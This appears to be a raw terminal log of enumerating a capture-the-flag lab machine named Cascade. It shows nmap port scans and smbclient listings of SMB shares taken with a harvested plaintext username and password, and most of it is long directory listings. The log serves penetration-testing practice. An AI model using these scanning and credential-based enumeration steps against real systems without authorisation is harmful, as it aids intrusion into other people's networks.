┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.182 [sudo] kali 的密码: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 20:07 CST Nmap scan report for10.10.10.182 Host is up (0.53s latency). Not shown: 65526 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3269/tcp open globalcatLDAPssl 49155/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown 49170/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 28.79 seconds
PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3269/tcp open tcpwrapped 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49170/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 98.30 seconds
┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.10.182 -sU Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 20:29 CST Nmap scan report for10.10.10.182 Host is up (0.58s latency). Not shown: 65534 open|filtered udp ports (no-response) PORT STATE SERVICE 53/udp open domain
Nmap done: 1 IP address (1 host up) scanned in 25.46 seconds
[+] IP: 10.10.10.182:445 Name: cascade.local Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin Audit$ NO ACCESS C$ NO ACCESS Default share Data READ ONLY IPC$ NO ACCESS Remote IPC NETLOGON READ ONLY Logon server share print$ READ ONLY Printer Drivers SYSVOL READ ONLY Logon server share
┌──(kali㉿offsec)-[~/Desktop] └─$ smbclient \\\\10.10.10.182\\Data -U r.thompson%rY4n5eva -c "recurse; ls" . D 0 Mon Jan 2711:27:342020 .. D 0 Mon Jan 2711:27:342020 Contractors D 0 Mon Jan 1309:45:112020 Finance D 0 Mon Jan 1309:45:062020 IT D 0 Wed Jan 2902:04:512020 Production D 0 Mon Jan 1309:45:182020 Temps D 0 Mon Jan 1309:45:152020
\IT . D 0 Wed Jan 2902:04:512020 .. D 0 Wed Jan 2902:04:512020 Email Archives D 0 Wed Jan 2902:00:302020 LogonAudit D 0 Wed Jan 2902:04:402020 Logs D 0 Wed Jan 2908:53:042020 Temp D 0 Wed Jan 2906:06:592020
\IT\Email Archives . D 0 Wed Jan 2902:00:302020 .. D 0 Wed Jan 2902:00:302020 Meeting_Notes_June_2018.html An 2522 Wed Jan 2902:00:122020
\IT\LogonAudit . D 0 Wed Jan 2902:04:402020 .. D 0 Wed Jan 2902:04:402020
\IT\Logs . D 0 Wed Jan 2908:53:042020 .. D 0 Wed Jan 2908:53:042020 Ark AD Recycle Bin D 0 Sat Jan 1100:33:452020 DCs D 0 Wed Jan 2908:56:002020
\IT\Temp . D 0 Wed Jan 2906:06:592020 .. D 0 Wed Jan 2906:06:592020 r.thompson D 0 Wed Jan 2906:06:532020 s.smith D 0 Wed Jan 2904:00:012020
\IT\Logs\Ark AD Recycle Bin . D 0 Sat Jan 1100:33:452020 .. D 0 Sat Jan 1100:33:452020 ArkAdRecycleBin.log A 1303 Wed Jan 2909:19:112020
\IT\Logs\DCs . D 0 Wed Jan 2908:56:002020 .. D 0 Wed Jan 2908:56:002020 dcdiag.log A 5967 Sat Jan 1100:17:302020
\IT\Temp\r.thompson . D 0 Wed Jan 2906:06:532020 .. D 0 Wed Jan 2906:06:532020
\IT\Temp\s.smith . D 0 Wed Jan 2904:00:012020 .. D 0 Wed Jan 2904:00:012020 VNC Install.reg A 2680 Wed Jan 2903:27:442020
┌──(kali㉿offsec)-[~/Desktop] └─$ smbclient \\\\10.10.10.182\\NETLOGON -U r.thompson%rY4n5eva -c "recurse; ls" . D 0 Thu Jan 1605:50:332020 .. D 0 Thu Jan 1605:50:332020 MapAuditDrive.vbs A 258 Thu Jan 1605:50:152020 MapDataDrive.vbs A 255 Thu Jan 1605:51:032020
6553343 blocks of size 4096.1613811 blocks available
┌──(kali㉿offsec)-[~/Desktop] └─$ smbclient \\\\10.10.10.182\\print$ -U r.thompson%rY4n5eva -c "recurse; ls" . D 0 Tue Jul 1413:37:102009 .. D 0 Tue Jul 1413:37:102009 color D 0 Tue Jul 1413:37:102009 IA64 D 0 Tue Jul 1412:58:302009 W32X86 D 0 Tue Jul 1412:58:302009 x64 D 0 Mon Jan 1311:09:112020
\color . D 0 Tue Jul 1413:37:102009 .. D 0 Tue Jul 1413:37:102009 D50.camp A 1058 Thu Jun 1104:46:162009 D65.camp A 1079 Thu Jun 1104:46:162009 Graphics.gmmp A 797 Thu Jun 1104:46:172009 MediaSim.gmmp A 838 Thu Jun 1104:46:212009 Photo.gmmp A 786 Thu Jun 1104:46:222009 Proofing.gmmp A 822 Thu Jun 1104:46:222009 RSWOP.icm A 218103 Thu Jun 1104:46:222009 sRGB Color Space Profile.icm A 3144 Thu Jun 1104:46:222009 wscRGB.cdmp A 17155 Thu Jun 1104:46:232009 wsRGB.cdmp A 1578 Thu Jun 1104:46:232009
\IA64 . D 0 Tue Jul 1412:58:302009 .. D 0 Tue Jul 1412:58:302009
\W32X86 . D 0 Tue Jul 1412:58:302009 .. D 0 Tue Jul 1412:58:302009
\x64 . D 0 Mon Jan 1311:09:112020 .. D 0 Mon Jan 1311:09:112020 3 D 0 Mon Jan 1311:09:122020 PCC D 0 Mon Jan 1311:12:372020
\x64\3 . D 0 Mon Jan 1311:09:122020 .. D 0 Mon Jan 1311:09:122020 brci14a.dll A 712192 Tue Jul 1409:40:122009 BRCI14A.GPD A 10706 Thu Jun 1104:41:112009 brci14a.ini A 61 Thu Jun 1104:41:112009 brci14ui.dll A 127488 Tue Jul 1409:41:342009 BRD116C.BUD A 31632 Fri Jan 1003:10:102020 BRD116C.GPD A 11248 Thu Jun 1104:41:112009 brio14aa.bcm A 127728 Thu Jun 1104:41:182009 brio14ab.bcm A 220536 Thu Jun 1104:41:182009 brio14ac.bcm A 127728 Thu Jun 1104:41:182009 brio14ad.bcm A 132440 Thu Jun 1104:41:182009 brio14af.bcm A 127728 Thu Jun 1104:41:182009 brio14ag.bcm A 220536 Thu Jun 1104:41:182009 brio14ah.bcm A 127728 Thu Jun 1104:41:182009 brio14ai.bcm A 132440 Thu Jun 1104:41:182009 brio14ak.bcm A 127728 Thu Jun 1104:41:182009 brio14al.bcm A 220536 Thu Jun 1104:41:182009 brio14am.bcm A 127728 Thu Jun 1104:41:182009 brio14an.bcm A 132440 Thu Jun 1104:41:192009 en-US D 0 Tue Jul 1413:41:172009 mui D 0 Tue Jul 1413:41:162009 mxdwdrv.dll A 715776 Sat Nov 2013:27:242010 mxdwdui.BUD A 57960 Mon Jan 1311:09:042020 mxdwdui.dll A 221184 Sat Nov 2013:27:242010 mxdwdui.gpd A 67628 Thu Jun 1104:58:192009 mxdwdui.ini A 42 Thu Jun 1104:58:192009 PS5UI.DLL A 847872 Sat Nov 2013:27:242010 PSCRIPT.HLP A 26038 Thu Jun 1104:40:592009 PSCRIPT.NTF A 1062732 Thu Jun 1104:59:372009 PSCRIPT5.DLL A 630272 Sat Nov 2013:27:242010 PS_SCHM.GDL A 5561 Thu Jun 1104:59:182009 STDDTYPE.GDL A 23812 Thu Jun 1104:59:192009 STDNAMES.GPD A 14362 Thu Jun 1104:59:192009 STDSCHEM.GDL A 59116 Thu Jun 1104:59:192009 STDSCHMX.GDL A 2278 Thu Jun 1104:59:192009 TPOG.bin A 415 Sat Mar 2200:22:542014 TPOG.chm A 21583 Sat Mar 2200:22:522014 TPPRN.DLL A 289608 Sat Mar 2200:22:522014 TPPrnUI.DLL A 1693000 Sat Mar 2200:22:502014 TPPrnUIchs.dll A 35144 Sat Mar 2200:22:522014 TPPrnUIcht.dll A 35144 Sat Mar 2200:22:502014 TPPrnUIcsy.dll A 41288 Sat Mar 2200:22:522014 TPPrnUIdeu.dll A 43336 Sat Mar 2200:22:562014 TPPrnUIell.dll A 42312 Sat Mar 2200:22:502014 TPPrnUIesn.dll A 43336 Sat Mar 2200:22:562014 TPPrnUIfra.dll A 43848 Sat Mar 2200:22:562014 TPPrnUIhun.dll A 41288 Sat Mar 2200:22:562014 TPPrnUIita.dll A 43336 Sat Mar 2200:22:522014 TPPrnUIjpn.dll A 37192 Sat Mar 2200:22:502014 TPPrnUIkor.dll A 37192 Sat Mar 2200:22:542014 TPPrnUIplk.dll A 41800 Sat Mar 2200:22:502014 TPPrnUIptb.dll A 42824 Sat Mar 2200:22:542014 TPPrnUIrus.dll A 42312 Sat Mar 2200:22:502014 TPPrnUIsve.dll A 41800 Sat Mar 2200:22:502014 TPPrnUItha.dll A 41288 Sat Mar 2200:22:542014 TPPS.DLL A 154448 Sat Mar 2200:22:542014 TPPS.INI A 60 Sat Mar 2200:22:542014 TPPS.PPD A 7175 Sat Mar 2200:22:562014 UNIDRV.DLL A 479232 Sat Nov 2013:27:282010 unidrv.hlp A 21225 Thu Jun 1104:40:592009 unidrvui.dll A 884224 Sat Nov 2013:27:242010 UNIRES.DLL A 762368 Sat Nov 2013:09:222010 XPSSVCS.DLL A 1576448 Sat Nov 2013:27:342010
\x64\PCC . D 0 Mon Jan 1311:12:372020 .. D 0 Mon Jan 1311:12:372020 ntprint.inf_amd64_neutral_4616c3de1949be6d.cab A 4073740 Mon Jan 1311:09:142020 oemprint.inf_amd64_neutral_1c61babacbb41e90.cab A 81740 Thu Jan 923:27:282020 oemprint.inf_amd64_neutral_eb780557355f07b5.cab A 1394271 Thu Jan 923:15:492020 prnbr009.inf_amd64_neutral_fd2ac5b9c40bd465.cab A 1457321 Fri Jan 1003:24:372020 prnms001.inf_amd64_neutral_9fe8503f82ce60fa.cab A 88480 Mon Jan 1311:09:152020
\x64\3\en-US . D 0 Tue Jul 1413:41:172009 .. D 0 Tue Jul 1413:41:172009 BRCI06UI.DLL.mui A 6144 Tue Jul 1410:28:042009 brci08ui.dll.mui A 5632 Tue Jul 1410:23:002009 brci14ui.dll.mui A 6144 Tue Jul 1410:27:542009 BRCLUI05.DLL.mui A 6656 Tue Jul 1410:25:082009 BRCLUI06.DLL.mui A 6656 Tue Jul 1410:30:322009 brmzui13.DLL.mui A 3584 Tue Jul 1410:27:242009 BRPTUI2.DLL.mui A 9216 Tue Jul 1410:27:142009 BRUUI23A.DLL.mui A 10240 Tue Jul 1410:30:062009 CNBBR273.DLL.mui A 2048 Tue Jul 1410:27:022009 CNBBR274.DLL.mui A 2048 Tue Jul 1410:29:502009 CNBBR276.DLL.mui A 2048 Tue Jul 1410:26:502009 CNBBR280.DLL.mui A 2048 Tue Jul 1410:26:342009 CNBBR281.DLL.mui A 2048 Tue Jul 1410:28:202009 CNBBR282.DLL.mui A 2048 Tue Jul 1410:23:122009 CNBBR283.DLL.mui A 2048 Tue Jul 1410:28:162009 CNBBR284.DLL.mui A 2048 Tue Jul 1410:28:122009 CNBBR285.DLL.mui A 2048 Tue Jul 1410:28:442009 CNBBR286.DLL.mui A 2048 Tue Jul 1410:30:262009 CNBBR288.DLL.mui A 2048 Tue Jul 1410:30:022009 CNBBR289.DLL.mui A 2048 Tue Jul 1410:24:442009 CNBBR290.DLL.mui A 2048 Tue Jul 1410:29:402009 CNBBR292.DLL.mui A 2048 Tue Jul 1410:26:462009 CNBBR293.DLL.mui A 2048 Tue Jul 1410:23:382009 CNBBR294.DLL.mui A 2048 Tue Jul 1410:25:262009 CNBBR297.DLL.mui A 2048 Tue Jul 1410:27:402009 CNBBR300.DLL.mui A 2048 Tue Jul 1410:24:102009 CNBBR301.DLL.mui A 2048 Tue Jul 1410:29:582009 CNBBR302.DLL.mui A 2048 Tue Jul 1410:30:082009 CNBBR303.DLL.mui A 2048 Tue Jul 1410:28:182009 CNBBR309.DLL.mui A 2048 Tue Jul 1410:29:462009 CNBBR310.DLL.mui A 2048 Tue Jul 1410:29:142009 CNBBR311.DLL.mui A 2048 Tue Jul 1410:30:082009 CNBBR312.DLL.mui A 2048 Tue Jul 1410:28:202009 CNBBR315.DLL.mui A 2048 Tue Jul 1410:27:222009 CNBBR316.DLL.mui A 2048 Tue Jul 1410:27:202009 CNBBR318.DLL.mui A 2048 Tue Jul 1410:26:102009 CNBBR319.DLL.mui A 2048 Tue Jul 1410:24:442009 CNBBR320.DLL.mui A 2048 Tue Jul 1410:24:562009 CNBBR323.DLL.mui A 2048 Tue Jul 1410:26:062009 CNBBR325.DLL.mui A 2048 Tue Jul 1410:29:082009 CNBBR326.DLL.mui A 2048 Tue Jul 1410:29:562009 CNBBR327.DLL.mui A 2048 Tue Jul 1410:29:422009 CNBBR328.DLL.mui A 2048 Tue Jul 1410:26:442009 CNBBR331.DLL.mui A 2048 Tue Jul 1410:23:022009 CNBBR332.DLL.mui A 2048 Tue Jul 1410:30:182009 CNBBR333.DLL.mui A 2048 Tue Jul 1410:30:182009 CNBBR334.DLL.mui A 2048 Tue Jul 1410:26:022009 CNBBR335.DLL.mui A 2048 Tue Jul 1410:29:462009 CNBBR339.DLL.mui A 2048 Tue Jul 1410:27:142009 CNBBR342.DLL.mui A 2048 Tue Jul 1410:28:522009 CNBBR346.DLL.mui A 2048 Tue Jul 1410:28:542009 CNBIC4_1.DLL.mui A 2048 Tue Jul 1410:28:242009 CNBIC4_2.DLL.mui A 2048 Tue Jul 1410:29:362009 CNBIC4_3.DLL.mui A 2048 Tue Jul 1410:27:362009 CNBIC4_4.DLL.mui A 2048 Tue Jul 1410:26:322009 CNBIC4_5.DLL.mui A 2048 Tue Jul 1410:23:522009 CNBIC4_6.DLL.mui A 2048 Tue Jul 1410:27:282009 CNBIC4_7.DLL.mui A 2048 Tue Jul 1410:28:262009 CNBIC4_8.DLL.mui A 2048 Tue Jul 1410:29:402009 CNBMR284.DLL.mui A 2048 Tue Jul 1410:27:362009 CNBMR285.DLL.mui A 2048 Tue Jul 1410:24:522009 CNBMR310.DLL.mui A 2048 Tue Jul 1410:26:422009 CNBPC4_1.DLL.mui A 2048 Tue Jul 1410:28:442009 CNBPC4_2.DLL.mui A 2048 Tue Jul 1410:27:062009 CNBPCOMM.DLL.mui A 2048 Tue Jul 1410:29:462009 CNBPV3.DLL.mui A 2560 Tue Jul 1410:23:542009 CNBPV4.DLL.mui A 2560 Tue Jul 1410:26:462009 CNBP_274.DLL.mui A 2048 Tue Jul 1410:25:422009 CNBP_276.DLL.mui A 2048 Tue Jul 1410:30:262009 CNBP_279.DLL.mui A 2048 Tue Jul 1410:24:242009 CNBP_280.DLL.mui A 2048 Tue Jul 1410:27:182009 CNBP_281.DLL.mui A 2048 Tue Jul 1410:26:102009 CNBP_282.DLL.mui A 2048 Tue Jul 1410:29:282009 CNBP_283.DLL.mui A 2048 Tue Jul 1410:23:042009 CNBP_284.DLL.mui A 2048 Tue Jul 1410:24:082009 CNBP_285.DLL.mui A 2048 Tue Jul 1410:25:002009 CNBP_286.DLL.mui A 2048 Tue Jul 1410:26:582009 CNBP_287.DLL.mui A 2048 Tue Jul 1410:29:442009 CNBP_288.DLL.mui A 2048 Tue Jul 1410:30:142009 CNBP_289.DLL.mui A 2048 Tue Jul 1410:26:182009 CNBP_290.DLL.mui A 2048 Tue Jul 1410:24:102009 CNBP_291.DLL.mui A 2048 Tue Jul 1410:26:262009 CNBP_292.DLL.mui A 2048 Tue Jul 1410:30:162009 CNBP_293.DLL.mui A 2048 Tue Jul 1410:29:022009 CNBP_294.DLL.mui A 2048 Tue Jul 1410:29:202009 CNBP_295.DLL.mui A 2048 Tue Jul 1410:23:582009 CNBP_297.DLL.mui A 2048 Tue Jul 1410:24:302009 CNBP_298.DLL.mui A 2048 Tue Jul 1410:29:262009 CNBP_300.DLL.mui A 2048 Tue Jul 1410:24:362009 CNBP_301.DLL.mui A 2048 Tue Jul 1410:29:362009 CNBP_302.DLL.mui A 2048 Tue Jul 1410:24:062009 CNBP_303.DLL.mui A 2048 Tue Jul 1410:29:442009 CNBP_309.DLL.mui A 2048 Tue Jul 1410:24:462009 CNBP_310.DLL.mui A 2048 Tue Jul 1410:29:502009 CNBP_311.DLL.mui A 2048 Tue Jul 1410:30:062009 CNBP_312.DLL.mui A 2048 Tue Jul 1410:30:162009 CNBP_315.DLL.mui A 2048 Tue Jul 1410:28:302009 CNBP_316.DLL.mui A 2048 Tue Jul 1410:26:142009 CNBP_317.DLL.mui A 2048 Tue Jul 1410:28:182009 CNBP_318.DLL.mui A 2048 Tue Jul 1410:25:222009 CNBP_319.DLL.mui A 2048 Tue Jul 1410:30:242009 CNBP_320.DLL.mui A 2048 Tue Jul 1410:29:102009 CNBP_321.DLL.mui A 2048 Tue Jul 1410:28:422009 CNBP_323.DLL.mui A 2048 Tue Jul 1410:24:362009 CNBP_324.DLL.mui A 2048 Tue Jul 1410:24:522009 CNBP_325.DLL.mui A 2048 Tue Jul 1410:29:482009 CNBP_326.DLL.mui A 2048 Tue Jul 1410:29:182009 CNBP_327.DLL.mui A 2048 Tue Jul 1410:28:562009 CNBP_328.DLL.mui A 2048 Tue Jul 1410:28:342009 CNBP_329.DLL.mui A 2048 Tue Jul 1410:30:342009 CNBP_331.DLL.mui A 2048 Tue Jul 1410:28:142009 CNBP_332.DLL.mui A 2048 Tue Jul 1410:26:402009 CNBP_333.DLL.mui A 2048 Tue Jul 1410:28:002009 CNBP_334.DLL.mui A 2048 Tue Jul 1410:23:382009 CNBP_335.DLL.mui A 2048 Tue Jul 1410:29:302009 CNBP_336.DLL.mui A 2048 Tue Jul 1410:30:322009 CNBP_337.DLL.mui A 2048 Tue Jul 1410:27:222009 CNBP_338.DLL.mui A 2048 Tue Jul 1410:29:422009 CNBP_339.DLL.mui A 2048 Tue Jul 1410:29:562009 CNBP_340.DLL.mui A 2048 Tue Jul 1410:27:402009 CNBP_341.DLL.mui A 2048 Tue Jul 1410:27:342009 CNBP_342.DLL.mui A 2048 Tue Jul 1410:24:422009 CNBP_346.DLL.mui A 2048 Tue Jul 1410:24:362009 CNN0B007.DLL.mui A 2048 Tue Jul 1410:25:402009 EP7RES00.DLL.mui A 4096 Tue Jul 1410:28:082009 EP7RES01.DLL.mui A 3584 Tue Jul 1410:28:262009 EP7UIP00.DLL.mui A 5120 Tue Jul 1410:26:402009 FXSRES.DLL.mui A 165376 Tue Jul 1410:28:242009 FXUCU001.DLL.mui A 7680 Tue Jul 1410:28:242009 hp6000at.dll.mui A 48640 Tue Jul 1410:29:562009 hp6000nt.dll.mui A 48640 Tue Jul 1410:25:182009 hp6500at.dll.mui A 48640 Tue Jul 1410:26:302009 hp6500nt.dll.mui A 48640 Tue Jul 1410:26:342009 hp8000at.dll.mui A 48640 Tue Jul 1410:29:382009 hp8500at.dll.mui A 48640 Tue Jul 1410:27:442009 hp8500gt.dll.mui A 48640 Tue Jul 1410:29:302009 hp8500nt.dll.mui A 48640 Tue Jul 1410:28:462009 hpb8500t.dll.mui A 49152 Tue Jul 1410:29:162009 hpc309at.dll.mui A 49152 Tue Jul 1410:26:462009 hpc4500t.dll.mui A 49152 Tue Jul 1410:28:242009 hpc4600t.dll.mui A 47616 Tue Jul 1410:27:582009 hpc5300t.dll.mui A 49152 Tue Jul 1410:23:562009 hpc5500t.dll.mui A 49152 Tue Jul 1410:25:122009 hpc6300t.dll.mui A 49152 Tue Jul 1410:27:342009 hpd2600t.dll.mui A 47616 Tue Jul 1410:27:562009 hpD5400t.dll.mui A 49152 Tue Jul 1410:27:282009 hpd7500t.dll.mui A 49152 Tue Jul 1410:27:042009 hpf4400t.dll.mui A 47616 Tue Jul 1410:24:562009 hpfevw73.dll.mui A 5120 Tue Jul 1410:28:302009 hpfiew71.dll.mui A 2048 Tue Jul 1410:30:162009 hpfiew73.dll.mui A 2048 Tue Jul 1410:30:022009 HPFIME50.DLL.mui A 2048 Tue Jul 1410:29:422009 hpfprw73.dll.mui A 3584 Tue Jul 1410:30:042009 HPZ3Awn7.DLL.mui A 21504 Tue Jul 1410:25:122009 HPZEVW71.DLL.mui A 6144 Tue Jul 1410:27:102009 hpzevw72.dll.mui A 5120 Tue Jul 1410:26:182009 HPZEVWN7.DLL.mui A 5120 Tue Jul 1410:24:362009 hpzlaw71.dll.mui A 20992 Tue Jul 1410:26:522009 HPZLAwn7.DLL.mui A 14336 Tue Jul 1410:27:382009 HPZLSWN7.DLL.mui A 18944 Tue Jul 1410:28:302009 hpzprw71.dll.mui A 3584 Tue Jul 1410:26:422009 hpzprw72.dll.mui A 3584 Tue Jul 1410:25:222009 HPZPRwn7.DLL.mui A 3584 Tue Jul 1410:26:082009 HPZUIW71.DLL.mui A 67584 Tue Jul 1410:25:242009 HPZUIWN7.DLL.mui A 47616 Tue Jul 1410:24:522009 KO0C0001.DLL.mui A 15360 Tue Jul 1410:26:042009 KYW7FR02.DLL.mui A 2048 Tue Jul 1410:25:502009 kyw7fr03.dll.mui A 2048 Tue Jul 1410:27:102009 kyw7fr04.dll.mui A 2048 Tue Jul 1410:26:522009 KYW7FRES.DLL.mui A 2048 Tue Jul 1410:24:122009 lxkpclrs.dll.mui A 7168 Tue Jul 1410:28:162009 lxkpclui.dll.mui A 27648 Tue Jul 1410:25:082009 lxkpsui.dll.mui A 30208 Tue Jul 1410:27:362009 LXKXLRES.DLL.mui A 8192 Tue Jul 1410:27:102009 LXKXLUI.DLL.mui A 27648 Tue Jul 1410:27:282009 OK9IBRES.DLL.mui A 3072 Tue Jul 1410:29:082009 OKDTERES.DLL.mui A 9216 Tue Jul 1410:30:022009 OKDTURES.DLL.mui A 6656 Tue Jul 1410:28:122009 PCL4RES.DLL.mui A 7168 Tue Jul 1410:24:082009 PCL5ERES.DLL.mui A 18944 Tue Jul 1410:29:322009 PCL5URES.DLL.mui A 18944 Tue Jul 1410:28:402009 PCLXL.DLL.mui A 2560 Tue Jul 1410:23:422009 PS5UI.DLL.mui A 14336 Tue Jul 1410:29:502009 PSCRIPT5.DLL.mui A 4096 Tue Jul 1410:25:022009 RIARES7.DLL.mui A 10752 Tue Jul 1410:29:582009 RIAUI17.DLL.mui A 29696 Tue Jul 1410:26:282009 RIAUI27.DLL.mui A 29696 Tue Jul 1410:24:382009 RIPSUI7.DLL.mui A 29696 Tue Jul 1410:27:262009 SH_1_RES.DLL.mui A 17408 Tue Jul 1410:24:422009 SODPPUI2.DLL.mui A 4096 Tue Jul 1410:27:502009 tsmxuui3.dll.mui A 6144 Tue Jul 1410:29:242009 tsprint.dll.mui A 4096 Tue Jul 1410:24:242009 TTYRES.DLL.mui A 2560 Tue Jul 1410:30:282009 TTYUI.DLL.mui A 5120 Tue Jul 1410:29:302009 UNIDRVUI.DLL.mui A 11264 Tue Jul 1410:27:102009 UNIRES.DLL.mui A 8704 Tue Jul 1410:28:182009
\x64\3\mui . D 0 Tue Jul 1413:41:162009 .. D 0 Tue Jul 1413:41:162009 0409 D 0 Tue Jul 1413:41:162009
\x64\3\mui\0409 . D 0 Tue Jul 1413:41:162009 .. D 0 Tue Jul 1413:41:162009 PSCRIPT.HLP A 26038 Thu Jun 1105:41:002009 TTYUI.HLP A 14387 Thu Jun 1105:41:002009 UNIDRV.HLP A 21225 Thu Jun 1105:41:002009
6553343 blocks of size 4096.1613811 blocks available
┌──(kali㉿offsec)-[~/Desktop] └─$ smbclient \\\\10.10.10.182\\SYSVOL -U r.thompson%rY4n5eva -c "recurse; ls" . D 0 Thu Jan 923:31:272020 .. D 0 Thu Jan 923:31:272020 cascade.local Dr 0 Thu Jan 923:31:272020
\cascade.local . D 0 Thu Jan 923:33:072020 .. D 0 Thu Jan 923:33:072020 DfsrPrivate DHSr 0 Thu Jan 923:33:072020 Policies D 0 Fri Jan 1003:42:402020 scripts D 0 Thu Jan 1605:50:332020
\cascade.local\Policies . D 0 Fri Jan 1003:42:402020 .. D 0 Fri Jan 1003:42:402020 {2906D621-7B58-40F1-AA47-4ED2AEF29484} D 0 Fri Jan 1002:13:002020 {31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Thu Jan 923:31:402020 {322FEA29-156D-4476-8A06-1935A3525C1C} D 0 Fri Jan 1002:29:342020 {4026EDF8-DBDA-4AED-8266-5A04B80D9327} D 0 Fri Jan 1003:42:312020 {6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Thu Jan 923:31:402020 {820E48A7-D083-4C2D-B5F8-B24462924714} D 0 Fri Jan 1002:33:512020 {D67C2AD5-44C7-4468-BA4C-199E75B2F295} D 0 Fri Jan 1003:42:402020
\cascade.local\scripts . D 0 Thu Jan 1605:50:332020 .. D 0 Thu Jan 1605:50:332020 MapAuditDrive.vbs A 258 Thu Jan 1605:50:152020 MapDataDrive.vbs A 255 Thu Jan 1605:51:032020
\cascade.local\Policies\{2906D621-7B58-40F1-AA47-4ED2AEF29484} . D 0 Fri Jan 1002:13:002020 .. D 0 Fri Jan 1002:13:002020 GPT.INI A 59 Fri Jan 1002:13:002020 Machine D 0 Fri Jan 1002:13:002020 User D 0 Fri Jan 1002:13:002020
\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9} . D 0 Thu Jan 923:31:402020 .. D 0 Thu Jan 923:31:402020 GPT.INI A 23 Mon Mar 2316:33:592020 MACHINE D 0 Thu Jan 923:31:402020 USER D 0 Thu Jan 923:31:402020
\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C} . D 0 Fri Jan 1002:29:342020 .. D 0 Fri Jan 1002:29:342020 GPO.cmt A 24 Fri Jan 1002:29:342020 GPT.INI A 64 Wed Jan 2906:07:512020 Machine D 0 Fri Jan 1003:45:582020 User D 0 Fri Jan 1003:46:062020
\cascade.local\Policies\{4026EDF8-DBDA-4AED-8266-5A04B80D9327} . D 0 Fri Jan 1003:42:312020 .. D 0 Fri Jan 1003:42:312020 GPT.INI A 59 Fri Jan 1003:42:312020 Machine D 0 Fri Jan 1003:42:312020 User D 0 Fri Jan 1003:42:312020
\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9} . D 0 Thu Jan 923:31:402020 .. D 0 Thu Jan 923:31:402020 GPT.INI A 23 Mon Jan 2701:12:152020 MACHINE D 0 Thu Jan 923:31:402020 USER D 0 Thu Jan 923:31:402020
\cascade.local\Policies\{820E48A7-D083-4C2D-B5F8-B24462924714} . D 0 Fri Jan 1002:33:512020 .. D 0 Fri Jan 1002:33:512020 GPT.INI A 59 Fri Jan 1002:33:512020 Machine D 0 Fri Jan 1002:33:512020 User D 0 Fri Jan 1002:33:512020
\cascade.local\Policies\{D67C2AD5-44C7-4468-BA4C-199E75B2F295} . D 0 Fri Jan 1003:42:402020 .. D 0 Fri Jan 1003:42:402020 GPT.INI A 59 Fri Jan 1003:42:402020 Machine D 0 Fri Jan 1003:42:402020 User D 0 Fri Jan 1003:42:402020
\cascade.local\Policies\{2906D621-7B58-40F1-AA47-4ED2AEF29484}\Machine . D 0 Fri Jan 1002:13:002020 .. D 0 Fri Jan 1002:13:002020
\cascade.local\Policies\{2906D621-7B58-40F1-AA47-4ED2AEF29484}\User . D 0 Fri Jan 1002:13:002020 .. D 0 Fri Jan 1002:13:002020
\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE . D 0 Thu Jan 923:31:402020 .. D 0 Thu Jan 923:31:402020 Microsoft D 0 Thu Jan 923:31:402020 Registry.pol A 2790 Thu Jan 923:48:032020 Scripts D 0 Thu Jan 923:50:502020
\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER . D 0 Thu Jan 923:31:402020 .. D 0 Thu Jan 923:31:402020
\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\Machine . D 0 Fri Jan 1003:45:582020 .. D 0 Fri Jan 1003:45:582020 Scripts D 0 Fri Jan 1003:45:582020
\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User . D 0 Fri Jan 1003:46:062020 .. D 0 Fri Jan 1003:46:062020 Documents & Settings D 0 Fri Jan 1003:46:062020 Scripts D 0 Fri Jan 1003:46:062020
\cascade.local\Policies\{4026EDF8-DBDA-4AED-8266-5A04B80D9327}\Machine . D 0 Fri Jan 1003:42:312020 .. D 0 Fri Jan 1003:42:312020
\cascade.local\Policies\{4026EDF8-DBDA-4AED-8266-5A04B80D9327}\User . D 0 Fri Jan 1003:42:312020 .. D 0 Fri Jan 1003:42:312020
\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE . D 0 Thu Jan 923:31:402020 .. D 0 Thu Jan 923:31:402020 Applications D 0 Fri Jan 1005:56:532020 Microsoft D 0 Thu Jan 923:31:402020 Scripts D 0 Fri Jan 1002:44:582020
\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER . D 0 Thu Jan 923:31:402020 .. D 0 Thu Jan 923:31:402020
\cascade.local\Policies\{820E48A7-D083-4C2D-B5F8-B24462924714}\Machine . D 0 Fri Jan 1002:33:512020 .. D 0 Fri Jan 1002:33:512020
\cascade.local\Policies\{820E48A7-D083-4C2D-B5F8-B24462924714}\User . D 0 Fri Jan 1002:33:512020 .. D 0 Fri Jan 1002:33:512020
